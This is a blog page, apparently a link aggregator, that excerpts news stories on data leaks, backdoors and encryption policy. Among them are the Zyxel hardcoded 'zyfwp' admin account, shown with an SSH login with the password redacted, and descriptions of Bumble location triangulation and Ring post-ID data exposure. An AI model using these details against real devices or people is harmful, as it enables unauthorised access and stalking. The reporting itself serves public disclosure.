The Linkielist

Linking ideas with the world

The Linkielist

Socialarcs 400GB of scraped data exposing 200+ million Facebook, Instagram and LinkedIn users. Again.

High-flying and rapidly growing Chinese social media management company Socialarks has suffered a huge data leak leading to the exposure of over 400GB of personal data including several high-profile celebrities and social media influencers.

The company’s unsecured ElasticSearch database contained personally identifiable information (PII) from at least 214 million social media users from around the world, using both populist consumer platforms such as Facebook and Instagram, as well as professional networks such as LinkedIn.

The Elastic instance was discovered as part of Safety Detectives’ cybersecurity mission of discovering online vulnerabilities that could potentially pose risks to the general public.  Once the owner of the data is identified, our team then informs the affected parties as soon as possible to mitigate the risk of any cybersecurity breaches and server leaks.

In Socialarks’ case, our team found the ElasticSearch server to be publicly exposed without password protection or encryption, during routine IP-address checks on potentially unsecured databases.

The lack of security apparatus on the company’s server meant that anyone in possession of the server IP-address could have accessed a database containing millions of people’s private information.

According to Anurag Sen, head of the Safety Detectives cybersecurity team, the affected database contained a “huge trove” of sensitive personal information to the tune of 408GB and more than 318 million records in total.

Given the sheer size of the data leak, it has been severely challenging for our team to unravel the full extent of the potential damage caused.

Our research team was able to determine that the entirety of the leaked data was “scraped” from social media platforms, which is both unethical and a violation of Facebook’s, Instagram’s and LinkedIn’s terms of service.

Moreover, it is important to note that Socialarks suffered a similar data breach in August 2020 leading to data from 150 million LinkedIn, Facebook and Instagram users being exposed.

Almost as a carbon-copy, August’s database breach revealed reams of personal data from 66 million LinkedIn users, 11.6 million Instagram accounts and 81.5 million Facebook accounts.

From the leaked data we discovered, it was possible to determine people’s full names, country of residence, place of work, position, subscriber data and contact information, as well as direct links to their profiles.

[…]

The database contained more than 408GB of data and more than 318 million records.

What was leaked?

Without any protection whatsoever, our research team discovered the following:

  • 11,651,162 Instagram user profiles
  • 66,117,839 LinkedIn user profiles
  • 81,551,567 Facebook user profiles
  • a further 55,300,000 Facebook profiles which were summarily deleted within a few hours after our team first discovered the server and its vulnerability.

What was  surprising, that the numbers of profiles affected in the data leak found by our team are the same as the numbers mentioned in the August data leak.  However, there were big differences, such as size of a database, the companies hosting those servers and the amount of indices.

The affected server, hosted by Tencent, was segmented into indices in order to store data obtained from each social media source. Our team discovered records from 3 major social media platforms: Instagram, Facebook and LinkedIn.

Instagram data

The Instagram index contained various popular personalities and online celebrities.

Our team discovered several high-profile influencers in the exposed database, including prominent food bloggers, celebrities and other social media influencers.

Instagram data

Celebrity Instagram profile including phone number and email address.

Every record contained public data scraped from influencer Instagram accounts, including their biographies, profile pictures, follower totals, location settings as well as personal information such as contact details in the form of email addresses and phone numbers.

Instagram data

The Instagram records exposed the following details:

  • Full name
  • Phone numbers for 6+ million users
  • Email addresses for all 11+ million users
  • Profile link
  • Username
  • Profile picture
  • Profile description
  • Average comment count
  • Number of followers and following count
  • Country of location
  • Specific locality in some cases
  • Frequently used hashtags

Facebook data

As mentioned above, the leak exposed 81.5 million Facebook user profiles with over 40 million exposed phone numbers and a further 32 million email address entries. Notably, most of the phone numbers our team discovered originated from pages and not individuals.

The Facebook records exposed the following details:

  • Full name
  • ‘About’ text
  • Email addresses
  • Phone numbers
  • Country of location
  • Like, Follow and Rating count
  • Messenger ID
  • Facebook link with profile pictures
  • Website link
  • Profile description

LinkedIn data

Finally, our team discovered 66.1 million LinkedIn user profiles with as many as 31 million leaked email addresses (not disclosed in the profile but obtained through other, as yet unknown, sources).

The LinkedIn records exposed the following details:

  • Full name
  • Email addresses
  • Job profile including job title and seniority level
  • LinkedIn profile link
  • User tags
  • Domain name
  • Connected social media account login names e.g., Twitter
  • Company name and revenue margin
LinkedIn data

Database search showing 66 million LinkedIn profile results including personal information such as job title, name and email address.

The chart below shows a sample breakdown of user-profiles, sorted by country, from a sample of 42 million records.

LinkedIn data

Unexplained presence of Instagram and LinkedIn personal data

Socialarks’ database contained scraped data including personal information, albeit user data was partially completed.

However, according to our findings, Socialarks’ database stored personal data for Instagram and LinkedIn users such as private phone numbers and email addresses for users that did not divulge such information publicly on their accounts. How Socialarks could possibly have access to such data in the first place remains unknown.

Also, the fact that such a large, active, and data-rich database was left completely unsecured (probably for a second time) is astonishing.

It remains unclear how the company managed to obtain private data from multiple secure sources.

Unexplained presence of Instagram and LinkedIn personal data

Instagram profile showing email and phone number despite information not being provided to Instagram.

It is also worth noting that Socialarks is based in China and was founded with private venture capital in 2014, while the vulnerable server is located in Hong Kong.

Source: Chinese start-up leaked 400GB of scraped data exposing 200+ million Facebook, Instagram and LinkedIn users

Amazon Ring Neighbors App Left User Data Exposed, incl addresses, lat + long

Ring, the Amazon-owned friend to nosy police departments everywhere, has suffered another embarrassing security stumble. The surveillance company’s Neighbors app—which was launched in 2018 as a kind of “neighborhood watch” feature—apparently left users exact geographical data and home address information exposed to the internet.

Neighbors is Ring’s online forum where users can share public safety information about what’s going on in their communities. It’s basically a more dystopian version of Nextdoor. Posts on Neighbors are public but supposedly anonymous, with a poster’s full name and location obscured. Yet, due to the recently discovered security bug, a savvy web explorer would’ve been able to access information about the home addresses, as well as the exact latitude and longitude, of a poster’s location, TechCrunch reports.

Similarly, every time a user posted on Neighbors, Ring servers generated a unique number for the post. These numbers increased incrementally with each post, making it easy to tie the identifying number to other information about the poster, including geographical data, according to TechCrunch. All of this was invisible to the app user, however.

Source: Amazon Ring Neighbors App Left User Data Exposed

I still don’t understand the use case for Ring. “I’m not here, leave the package” – right, I’ll just break in now then!

Zyxel products have a hardcoded root user you can access from internet

TL;DR: If you have a Zyxel USG, ATP, VPN, ZyWALL or USG FLEX you should update to the latest firmware version today. You can find the full list of affected devices here and the Zyxel advisory here.

Zyxel is a popular brand for firewalls that are marketed towards small and medium businesses. Their Unified Security Gateway (USG) product line is often used as a firewall or VPN gateway. As a lot of us are working from home, VPN-capable devices have been quite selling well lately.

When doing some research (rooting) on my Zyxel USG40, I was surprised to find a user account ‘zyfwp’ with a password hash in the latest firmware version (4.60 patch 0). The plaintext password was visible in one of the binaries on the system. I was even more surprised that this account seemed to work on both the SSH and web interface.

$ ssh zyfwp@192.168.1.252
Password: Pr*******Xp
Router> show users current
No: 1
  Name: zyfwp
  Type: admin
(...)
Router>

The user is not visible in the interface and its password cannot be changed. I checked the previous firmware version (4.39) and although the user was present, it did not have a password. It seemed the vulnerability had been introduced in the latest firmware version. Even though older versions do not have this vulnerability, they do have others (such as this buffer overflow) so you should still update.

As SSL VPN on these devices operates on the same port as the web interface, a lot of users have exposed port 443 of these devices to the internet. Using publicly available data from Project Sonar, I was able to identify about 3.000 Zyxel USG/ATP/VPN devices in the Netherlands. Globally, more than 100.000 devices have exposed their web interface to the internet.

Source: Undocumented user account in Zyxel products (CVE-2020-29583) – EYE

Spotify resets passwords after a security bug exposed users’ private account information – for 6 months

Spotify said it has reset an undisclosed number of user passwords after blaming a software vulnerability in its systems for exposing private account information to its business partners.

In a data breach notification filed with the California attorney general’s office, the music streaming giant said the data exposed “may have included email address, your preferred display name, password, gender, and date of birth only to certain business partners of Spotify.” The company did not name the business partners, but added that Spotify “did not make this information publicly accessible.”

Spotify said the vulnerability existed as far back as April 9 but wasn’t discovered until November 12. But like most data breach notices, Spotify did not say what the vulnerability was or how user account data became exposed.

“We have conducted an internal investigation and have contacted all of our business partners that may have had access to your account information to ensure that any personal information that may have been inadvertently disclosed to them has been deleted,” the letter read.

Spotify spokesperson Adam Grossberg confirmed that a “small subset” of Spotify users are affected, but did not provide a specific figure. Spotify has more than 320 million users, and 144 million subscribers.

It’s the second time in as many months that the company has reset user passwords.

Last month security researchers found an unsecured database, likely operated by hackers, allegedly containing around 300,000 stolen user passwords. The database was probably used to launch credential stuffing attacks, in which lists of stolen passwords are matched against different websites that use the same password.

Although in that case the exposed data did not come from Spotify, the company reset the passwords on affected user accounts.

Source: Spotify resets passwords after a security bug exposed users’ private account information | TechCrunch

Data of 243 million Brazilians exposed online via govt website source code

The personal information of more than 243 million Brazilians, including alive and deceased, has been exposed online after web developers left the password for a crucial government database inside the source code of an official Brazilian Ministry of Health’s website for at least six months.

The security snafu was discovered by reporters from Brazilian newspaper Estadao, the same newspaper that last week discovered that a Sao Paolo hospital leaked personal and health information for more than 16 million Brazilian COVID-19 patients after an employee uploaded a spreadsheet with usernames, passwords, and access keys to sensitive government systems on GitHub.

Estadao reporters said they were inspired by a report filed in June by Brazilian NGO Open Knowledge Brasil (OKBR), which, at the time, reported that a similar government website also left exposed login information for another government database in the site’s source code.

Since a website’s source code can be accessed and reviewed by anyone pressing F12 inside their browser, Estadao reporters searched for similar issues in other government sites.

They found a similar leak in the source code of e-SUS-Notifica, a web portal where Brazilian citizens can sign up and receive official government notifications about the COVID-19 pandemic

[…]

Source: Data of 243 million Brazilians exposed online via website source code | ZDNet

Bumble Left Daters’ Location Data Up For Grabs For Over Six Months

Bumble, the dating app behemoth that’s allegedly headed to a major IPO as soon as next year, apparently took over half a year to deal with major security flaws that left sensitive information its millions of users vulnerable.

That’s according to new research posted over the weekend by cybersecurity firm Independent Security Evaluators (ISE) detailing how a bad actor—even one that was banned from Bumble—could exploit a vulnerability in the app’s underlying code to pull the rough location data for any Bumbler within their city, as well as additional profile data like photos and religious views. Despite being informed about this vulnerability in mid-March, the company didn’t patch the issues until November 12—roughly six and a half months later.

Pre-patch, anyone with a Bumble account could query the app’s API in order to figure out roughly how many miles away any other user in their city happened to be. As the blog’s author, Sanjana Sarda, explained, if a certain creepy someone really wanted to figure out the location of a given Bumble user, it wouldn’t be too hard to set up a handful of accounts, figure out the user’s basic distance from each one, and use that collection of data to triangulate a Bumbler’s precise location.

Bumble isn’t the first company to accidentally leave this sort of data freely available. Last year, cybersecurity sleuths were able to create to glean precise locations of people using LGBT-centric dating apps like Grindr and Romeo and collate them into a user location map. And those location-data leaks are on top of the deliberate data sharing these sorts of dating apps typically already engage in with a bevy third-party partners. You would think that an app purporting to be a feminist haven like Bumble might extend its idea of user safety to its data practices.

While some of the issues described by Sarda have been resolved, the belated patch apparently didn’t tackle one of the other major API-based issues described in the blog, which allowed ISE to get unlimited swipes (or “votes” in Bumble parlance), along with access to other premium features like the ability to unswipe or to see who might have swiped right on them. Typically, accessing these features cost a given Bumbler roughly $10 dollars per week.

Source: Bumble Left Daters’ Location Data Up For Grabs For Over Six Months

Microsoft: Russian, North Korean Hackers Attacked Covid-19 Labs

Microsoft researchers have found evidence that Russian and North Korean hackers have systematically attacked covid-19 labs and vaccine makers in an effort to steal data and initiate ransomware attacks.

“Among the targets, the majority are vaccine makers that have Covid-19 vaccines in various stages of clinical trials, clinical research organization involved in trials, and one has developed a Covid-19 test,” said Tom Burt, a VP in Customer Security at Microsoft. “Multiple organizations targeted have contracts with or investments from government agencies from various democratic countries for Covid-19 related work.”

“The targets include leading pharmaceutical companies and vaccine researchers in Canada, France, India, South Korea, and the United States. The attacks came from Strontium, an actor originating from Russia, and two actors originating from North Korea that we call Zinc and Cerium,” wrote Burt.

The attacks seem to be brute force login attempts and spear-phishing meant to lure victims to give up their security credentials. Microsoft, obviously, reports that its tools were able to catch and prevent most of the attacks. Sadly, the hackers are pretending to be World Health Organization reps in order to trick doctors into installing malware.

Zack Whittaker at TechCrunch noted that the Russian group, Strontium, is better known as APT28 or Fancy Bear, and the other groups are probably part of the North Korean Lazarus Group, the hackers responsible for WannaCry ransomware and the Sony hack in 2016.

Source: Microsoft: Russian, North Korean Hackers Attacked Covid-19 Labs

Microsoft warns against SMS, voice calls for multi-factor authentication: Try something that can’t be SIM swapped

In a blog post, Alex Weinert, director of identity security at Microsoft, says people should definitely use MFA. He claims that accounts using any type of MFA get compromised at a rate that’s less than 0.1 per cent of the general population.

At the same time, he argues people should avoid relying on SMS messages or voice calls to handle one-time passcodes (OTPs) because phone-based protocols are fundamentally insecure.

“These mechanisms are based on public switched telephone networks (PSTN), and I believe they’re the least secure of the MFA methods available today,” said Weinert. “That gap will only widen as MFA adoption increases attackers’ interest in breaking these methods and purpose-built authenticators extend their security and usability advantages.”

Hacking techniques like SIM swapping – where a miscreant calls a mobile carrier posing as a customer to request the customer’s number be ported to a different SIM card in the attacker’s possession – and more sophisticated network attacks like SS7 interception have demonstrated the security shortcomings of public phone networks and the companies running them.

Computer scientists from Princeton University examined SIM swapping in a research study [PDF] earlier this year and their results support Weinert’s claims. They tested AT&T, T-Mobile, Tracfone, US Mobile, and Verizon Wireless and found “all 5 carriers used insecure authentication challenges that could easily be subverted by attackers.”

They also looked at 140 online services that used phone-based authentication to see whether they resisted SIM swapping attacks. And they found 17 had authentication policies that allowed an attacker to hijack an account with a SIM swap.

In September, security firm Check Point Research published a report describing various espionage campaigns, including the discovery of malware that sets up an Android backdoor to steal two-factor authentication codes from SMS messages.

Weinert argues that SMS and voice protocols were not designed with encryption, are easy to attack using social engineering, rely on unreliable mobile carriers, and are subject to shifting regulation.

[…]

Source: Microsoft warns against SMS, voice calls for multi-factor authentication: Try something that can’t be SIM swapped • The Register

Swiss spies knew about Crypto AG compromise – and kept it from govt overseers for nearly 30 years

Swiss politicians only found out last year that cipher machine company Crypto AG was (quite literally) owned by the US and Germany during the Cold War, a striking report from its parliament has revealed.

The company, which supplied high-grade encryption machines to governments and corporations around the world, was in fact owned by the US civilian foreign intelligence service the CIA and Germany’s BND spy agency during the Cold War, as we reported earlier this year.

Although Swiss spies themselves knew that Crypto AG’s products were being intentionally weakened so the West could read messages passing over them, they didn’t tell governmental overseers until last year – barely one year after the operation ended.

So stated the Swiss federal parliament in a report published yesterday afternoon, which has caused fresh raising of eyebrows over the scandal. While infosec greybeard Bruce Schneier told El Reg last year: “I thought we knew this for decades,” referring to age-old (but accurate, though officially denied) news reports of the compromise, this year’s revelations have been the first official admissions that not only was this going on, but that it was deliberately hidden from overseers.

[…]

The revelations that the Swiss state itself knew about Crypto AG’s operations may prove to be a diplomatic embarrassment; aside from secrecy and chocolate, Switzerland’s other big selling point on the international stage is that it is very publicly and deliberately neutral. Secretly cooperating with Western spies during the Cold War and beyond, and enabling spying on state-level customers, is likely to harm that reputation.

Professor Woodward concluded: “If nothing else this whole episode shows that it’s easier to interfere with equipment handling encryption than to try to tackle the encryption head on. But, it has a warning for those who would seek to give a golden key, weaken encryption or provide some other means for government agencies to read encrypted messages. Just like you can’t be a little bit pregnant, if the crypto is weakened then you have to assume your communications are no longer secure.”

Source: Swiss spies knew about Crypto AG compromise – and kept it from govt overseers for nearly 30 years • The Register

EU Takes Another Small Step Towards Trying To Ban Encryption; New Paper Argues Tech Can Backdoor Encryption Safely. It can’t.

In September, we noted that officials in the EU were continuing an effort to try to ban end-to-end encryption. Of course, that’s not how they put it. They say they just want “lawful access” to encrypted content, not recognizing that any such backdoor effectively obliterates the protections of end-to-end encryption. A new “Draft Council Resolution on Encryption” has come out as the EU Council of Ministers continues to drift dangerously towards this ridiculous position.

We’ve seen documents like this before. It starts out with a preamble insisting that they’re not really trying to undermine encryption, even though they absolutely are.

The European Union fully supports the development, implementation and use of strong encryption. Encryption is a necessary means of protecting fundamental rights and the digital security of governments, industry and society. At the same time, the European Union needs to ensure the ability of competent authorities in the area of security and criminal justice, e.g. law enforcement and judicial authorities, to exercise their lawful powers, both online and offline.

Uh huh. That’s basically we fully support you having privacy in your own home, except when we need to spy on you at a moment’s notice. It’s not so comforting when put that way, but it’s what they’re saying.

[…]

This is the same old garbage we’ve seen before. Technologically illiterate bureaucrats who have no clue at all, insisting that if they just “work together” with the tech industry, some magic golden key will be found. This is not how any of this works. Introducing a backdoor into encryption is introducing a massive, dangerous vulnerability

[…]

Attacking end-to-end encryption in order to deal with the miniscule number of situations where law enforcement is stymied by encryption would, in actuality, put everyone at massive risk of having their data accessed by malicious parties.

[…]

Source: EU Takes Another Small Step Towards Trying To Ban Encryption; New Paper Argues Tech Can Nerd Harder To Backdoor Encryption | Techdirt

Introducing a backdoor is introducing a vulnerability – one that anyone can exploit. The good guys, the bad guys and the idiots. There is a long and varied history of exploited backdoors in all kinds of very important stuff (eg the clipper chip, the encryption hardware sold to governments, mobile phone networks, even kids smartwatches, switches, and they’ve all been misused by malicious actors.

Here is a long but not conclusive list

Hotels.com, Booking.com Expedia provider exposed data from 2013 for millions of guests on open AWS bucket

Website Planet reports that Prestige Software, the company behind hotel reservation platforms for Hotels.com, Booking.com and Expedia, left data exposed for “millions” of guests on an Amazon Web Services S3 bucket. The 10 million-plus log files dated as far back as 2013 and included names, credit card details, ID numbers and reservation details.

It’s not certain how long the data was left open, or if anyone took the data. Website Planet said the hole was closed a day after telling AWS about the exposure. Prestige confirmed that it owned the data.

The damage could be severe if crooks found the data. WP warned that it could lead to all too common risks with hotel data exposures like credit card fraud, identity theft and phishing scams. Perpetrators could even hijack a reservation to steal someone else’s vacation.

Source: Hotels.com, Expedia provider exposed data for millions of guests | Engadget

UK Company House Demands Company Stop Using Name Which Includes an HTML Closing Tag

A British software engineer came up with “a fun playful name” for his consulting business. He’d named it:

“”>

Unfortunately, this did not amuse the official registrar of companies in the United Kingdom (known as Companies House). The Guardian reports that the U.K. agency “has forced the company to change its name after it belatedly realised it could pose a security risk.” Henceforward, the software engineer’s consulting business will instead be legally known as “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD.” He now says he didn’t realise that Companies House was actually vulnerable to the extremely simple technique he used, known as “cross-site scripting”, which allows an attacker to run code from one website on another.
Engadget adds: Companies House, meanwhile, said it had “put measures in place” to prevent a repeat. You won’t be trying this yourself, at least not in the U.K.

It’s more than a little amusing to see a for-the-laughs code name stir up trouble, but this also illustrates just how fragile web security can be.

Source: UK Agency Demands Company Stop Using Name Which Includes an HTML Closing Tag – Slashdot

Android v 7.1.1 and lower Won’t Support Many Secure Certificates in 2021

One of the world’s top certificate authorities warns that phones running versions of Android prior to 7.1.1 Nougat will be cut off from large portions of the secure web starting in 2021, Android Police reported Saturday.

The Mozilla-partnered nonprofit Let’s Encrypt said that its partnership with fellow certificate authority IdenTrust will expire on Sept. 1, 2021. Since it has no plans to renew its cross-signing agreement, Let’s Encrypt plans to stop default cross-signing for IdenTrust’s root certificate, DST Root X3, beginning on Jan. 11 as the organization switches over to solely using its own ISRG Root X1 root.

It’s a pretty significant shift considering that as much as one-third of all web domains rely on the organization’s certificates. But since older software won’t trust Let’s Encrypt’s root certificate, this could “introduce some compatibility woes,” lead developer Jacob Hoffman-Andrews said in a blog post Friday.

“Some software that hasn’t been updated since 2016 (approximately when our root was accepted to many root programs) still doesn’t trust our root certificate, ISRG Root X1,” he said. “Most notably, this includes versions of Android prior to 7.1.1. That means those older versions of Android will no longer trust certificates issued by Let’s Encrypt.”

The only workaround for these users would be to install Firefox since it relies on its own certificate store that includes Let’s Encrypt’s root, though that wouldn’t keep applications from breaking or ensure functionality beyond your browser.

Let’s Encrypt noted that roughly 34% of Android devices are running a version older than 7.1 based on data from Google’s Android development suite. That translates to millions of users potentially being cut off from large portions of the secure web beginning in 2021

Source: Older Android Phones Won’t Support Many Secure Websites in 2021

Physical Security Blueprints of Many Companies Leaked in Hack of Swedish Firm Gunnebo

In March 2020, KrebsOnSecurity alerted Swedish security giant Gunnebo Group that hackers had broken into its network and sold the access to a criminal group which specializes in deploying ransomware. In August, Gunnebo said it had successfully thwarted a ransomware attack, but this week it emerged that the intruders stole and published online tens of thousands of sensitive documents — including schematics of client bank vaults and surveillance systems.

The Gunnebo Group is a Swedish multinational company that provides physical security to a variety of customers globally, including banks, government agencies, airports, casinos, jewelry stores, tax agencies and even nuclear power plants. The company has operations in 25 countries, more than 4,000 employees, and billions in revenue annually.

Acting on a tip from Milwaukee, Wis.-based cyber intelligence firm Hold Security, KrebsOnSecurity in March told Gunnebo about a financial transaction between a malicious hacker and a cybercriminal group which specializes in deploying ransomware. That transaction included credentials to a Remote Desktop Protocol (RDP) account apparently set up by a Gunnebo Group employee who wished to access the company’s internal network remotely.

[…]

Larsson quotes Gunnebo CEO Stefan Syrén saying the company never considered paying the ransom the attackers demanded in exchange for not publishing its internal documents. What’s more, Syrén seemed to downplay the severity of the exposure.

“I understand that you can see drawings as sensitive, but we do not consider them as sensitive automatically,” the CEO reportedly said. “When it comes to cameras in a public environment, for example, half the point is that they should be visible, therefore a drawing with camera placements in itself is not very sensitive.”

It remains unclear whether the stolen RDP credentials were a factor in this incident. But the password to the Gunnebo RDP account — “password01” — suggests the security of its IT systems may have been lacking in other areas as well.

[…]

Source: Security Blueprints of Many Companies Leaked in Hack of Swedish Firm Gunnebo — Krebs on Security

In a first, researchers extract secret key used to encrypt Intel CPU code

Researchers have extracted the secret key that encrypts updates to an assortment of Intel CPUs, a feat that could have wide-ranging consequences for the way the chips are used and, possibly, the way they’re secured.

The key makes it possible to decrypt the microcode updates Intel provides to fix security vulnerabilities and other types of bugs. Having a decrypted copy of an update may allow hackers to reverse engineer it and learn precisely how to exploit the hole it’s patching. The key may also allow parties other than Intel—say a malicious hacker or a hobbyist—to update chips with their own microcode, although that customized version wouldn’t survive a reboot.

“At the moment, it is quite difficult to assess the security impact,” independent researcher Maxim Goryachy said in a direct message. “But in any case, this is the first time in the history of Intel processors when you can execute your microcode inside and analyze the updates.” Goryachy and two other researchers—Dmitry Sklyarov and Mark Ermolov, both with security firm Positive Technologies—worked jointly on the project.

The key can be extracted for any chip—be it a Celeron, Pentium, or Atom—that’s based on Intel’s Goldmont architecture.

[…]

attackers can’t use Chip Red Pill and the decryption key it exposes to remotely hack vulnerable CPUs, at least not without chaining it to other vulnerabilities that are currently unknown. Similarly, attackers can’t use these techniques to infect the supply chain of Goldmont-based devices.

[…]

In theory, it might also be possible to use Chip Red Pill in an evil maid attack, in which someone with fleeting access to a device hacks it. But in either of these cases, the hack would be tethered, meaning it would last only as long as the device was turned on. Once restarted, the chip would return to its normal state. In some cases, the ability to execute arbitrary microcode inside the CPU may also be useful for attacks on cryptography keys, such as those used in trusted platform modules.

“For now, there’s only one but very important consequence: independent analysis of a microcode patch that was impossible until now,” Positive Technologies researcher Mark Ermolov said. “Now, researchers can see how Intel fixes one or another bug/vulnerability. And this is great. The encryption of microcode patches is a kind of security through obscurity.”

Source: In a first, researchers extract secret key used to encrypt Intel CPU code | Ars Technica

NSA: foreign spies used one of our crypto backdoors – we learnt some lessons but we lost them

It’s said the NSA drew up a report on what it learned after a foreign government exploited a weak encryption scheme, championed by the US spying agency, in Juniper firewall software.

However, curiously enough, the NSA has been unable to find a copy of that report.

On Wednesday, Reuters reporter Joseph Menn published an account of US Senator Ron Wyden’s efforts to determine whether the NSA is still in the business of placing backdoors in US technology products.

Wyden (D-OR) opposes such efforts because, as the Juniper incident demonstrates, they can backfire, thereby harming national security, and because they diminish the appeal of American-made tech products.

But Wyden’s inquiries, as a member of the Senate Intelligence Committee, have been stymied by lack of cooperation from the spy agency and the private sector. In June, Wyden and various colleagues sent a letter to Juniper CEO Rami Rahim asking about “several likely backdoors in its NetScreen line of firewalls.”

Juniper acknowledged in 2015 that “unauthorized code” had been found in ScreenOS, which powers its NetScreen firewalls. It’s been suggested that the code was in place since around 2008.

The Reuters report, citing a previously undisclosed statement to Congress from Juniper, claims that the networking biz acknowledged that “an unnamed national government had converted the mechanism first created by the NSA.”

Wyden staffers in 2018 were told by the NSA that a “lessons learned” report about the incident had been written. But Wyden spokesperson Keith Chu told Reuters that the NSA now claims it can’t find the file. Wyden’s office did not immediately respond to a request for comment.

The reason this malicious code was able to decrypt ScreenOS VPN connections has been attributed to Juniper’s “decision to use the NSA-designed Dual EC Pseudorandom Number Generator.”

[…]

After Snowden’s disclosures about the extent of US surveillance operations in 2013, the NSA is said to have revised its policies for compromising commercial products. Wyden and other lawmakers have tried to learn more about these policies but they’ve been stonewalled, according to Reuters.

[…]

Source: NSA: We’ve learned our lesson after foreign spies used one of our crypto backdoors – but we can’t say how exactly • The Register

And this is why you don’t put out insecure security products, which is exactly what products with a backdoor are. Here’s looking at you, UK and Australia and all the other countries trying to force insecure products on us.

‘Classified knots’: Researchers create optical framed knots to encode information

In a world first, researchers from the University of Ottawa in collaboration with Israeli scientists have been able to create optical framed knots in the laboratory that could potentially be applied in modern technologies. Their work opens the door to new methods of distributing secret cryptographic keys—used to encrypt and decrypt data, ensure secure communication and protect private information. The group recently published their findings in Nature Communications.

“This is fundamentally important, in particular from a topology-focused perspective, since framed knots provide a platform for topological quantum computations,” explained senior author, Professor Ebrahim Karimi, Canada Research Chair in Structured Light at the University of Ottawa.

“In addition, we used these non-trivial optical structures as information carriers and developed a security protocol for classical communication where information is encoded within these framed knots.”

The concept

The researchers suggest a simple do-it-yourself lesson to help us better understand framed knots, those that can also be described as a surface.

“Take a narrow strip of a paper and try to make a ,” said first author Hugo Larocque, uOttawa alumnus and current Ph.D. student at MIT.

“The resulting object is referred to as a framed knot and has very interesting and important mathematical features.”

The group tried to achieve the same result but within an optical beam, which presents a higher level of difficulty. After a few tries (and knots that looked more like knotted strings), the group came up with what they were looking for: a knotted ribbon structure that is quintessential to framed knots.

Encryption scheme of a framed braid within a framed knot. The knot along with a pair of numbers can be used to recover the encrypted braid by means of a procedure relying on prime factorization. Credit: University of Ottawa

“In order to add this ribbon, our group relied on beam-shaping techniques manipulating the vectorial nature of light,” explained Hugo Larocque. “By modifying the oscillation direction of the light field along an “unframed” optical knot, we were able to assign a frame to the latter by “gluing” together the lines traced out by these oscillating fields.”

According to the researchers, structured light beams are being widely exploited for encoding and distributing information.

“So far, these applications have been limited to physical quantities which can be recognized by observing the beam at a given position,” said uOttawa Postdoctoral Fellow and co-author of this study, Dr. Alessio D’Errico.

“Our work shows that the number of twists in the ribbon orientation in conjunction with prime number factorization can be used to extract a so-called “braid representation” of the knot.”

“The structural features of these objects can be used to specify processing programs,” added Hugo Larocque. “In a situation where this program would want to be kept secret while disseminating it between various parties, one would need a means of encrypting this “braid” and later deciphering it. Our work addresses this issue by proposing to use our optical framed knot as an encryption object for these programs which can later be recovered by the braid extraction method that we also introduced.”

“For the first time, these complicated 3-D structures have been exploited to develop new methods for the distribution of secret cryptographic keys. Moreover, there is a wide and strong interest in exploiting topological concepts in quantum computation, communication and dissipation-free electronics. Knots are described by specific topological properties too, which were not considered so far for cryptographic protocols.”

Rendition of the reconstructed structure of a framed trefoil knot generated within an optical beam. Credit: University

[…]

The paper “Optical framed knots as information carriers” was recently published in Nature Communications.


More information: Hugo Larocque et al, Optical framed knots as information carriers, Nature Communications (2020). DOI: 10.1038/s41467-020-18792-z

Source: ‘Classified knots’: Researchers create optical framed knots to encode information

Facebook Login Issues Are Locking Oculus Quest 2 Owners Out of Their Devices, turning them into paperweights

Owners of the brand-new Oculus Quest 2—the first VR headset which requires a Facebook account to use—are finding themselves screwed out of their new purchases by Facebook’s account verification system.

As first reported by UploadVR this week, some Oculus 2 owners are finding that Facebook’s reportedly AI-powered account verification system is demanding some users upload a photo before they can proceed with logging in. Others who have previously suspended their Facebook accounts are getting insta-banned upon reactivation and reported they were subsequently unable to create a new account, or said they were locked out upon trying to merge their old Oculus usernames with their Facebook accounts. Facebook’s failure prompt gave no way for users to appeal directly, essentially turning the $300 units into expensive bricks.

On the Oculus subreddit, one user reported that they had uploaded a photo ID to Facebook and received a response stating that “we have already reviewed this decision and it can’t be reversed.”

[…]

Source: Facebook Login Issues Are Locking Oculus Quest 2 Owners Out of Their Devices

Yay cloud!

Backdoorer the Xplora: Kids’ smart-watches can secretly take pics, record audio on command by encrypted texts

The Xplora 4 smartwatch, made by Chinese outfit Qihoo 360 Technology Co, and marketed to children under the Xplora brand in the US and Europe, can covertly take photos and record audio when activated by an encrypted SMS message, says Norwegian security firm Mnemonic.

This backdoor is not a bug, the finders insist, but a deliberate, hidden feature. Around 350,000 watches have been sold so far, Xplora says. Exploiting this security hole is essentially non-trivial, we note, though it does reveal the kind of remotely accessible stuff left in the firmware of today’s gizmos.

“The backdoor itself is not a vulnerability,” said infosec pros Harrison Sand and Erlend Leiknes in a report on Monday. “It is a feature set developed with intent, with function names that include remote snapshot, send location, and wiretap. The backdoor is activated by sending SMS commands to the watch.”

The researchers suggest these smartwatches could be used to capture photos covertly from its built-in camera, to track the wearer’s location, and to conduct wiretapping via the built-in mic. They have not claimed any such surveillance has actually been done. The watches are marketed as a child’s first phone, we’re told, and thus contain a SIM card for connectivity (with an associated phone number). Parents can track the whereabouts of their offspring by using an app that finds the wearer of the watch.

It is a feature set developed with intent, with function names that include remote snapshot, send location, and wiretap. The backdoor is activated by sending SMS commands to the watch

Xplora contends the security issue is just unused code from a prototype and has now been patched. But the company’s smartwatches were among those cited by Mnemonic and Norwegian Consumer Council in 2017 for assorted security and privacy concerns.

Sand and Leiknes note in their report that while the Norwegian company Xplora Mobile AS distributes the Xplora watch line in Europe and, as of September, in the US, the hardware was made by Qihoo 360 and 19 of its 90 Android-based applications come from the Chinese company.

They also point out that in June, the US Department of Commerce placed the Chinese and UK business groups of Qihoo 360 on its Entities List, a designation that limits Qihoo 360’s ability to do business with US companies. US authorities claim, without offering any supporting evidence, that the company represents a potential threat to US national security.

In 2012, a report by a China-based civilian hacker group called Intelligent Defense Friends Laboratory accused Qihoo 360 of having a backdoor in its 360 secure browser [[PDF]].

In March, Qihoo 360 claimed that the US Central Intelligence Agency has been conducting hacking attacks on China for over a decade. Qihoo 360 did not immediately respond to a request for comment.

According to Mnemonic, the Xplora 4 contains a package called “Persistent Connection Service” that runs during the Android boot process and iterates through the installed apps to construct a list of “intents,” commands for invoking functionality in other apps.

With the appropriate Android intent, an incoming encrypted SMS message received by the Qihoo SMS app could be directed through the command dispatcher in the Persistent Connection Service to trigger an application command, like a remote memory snapshot.

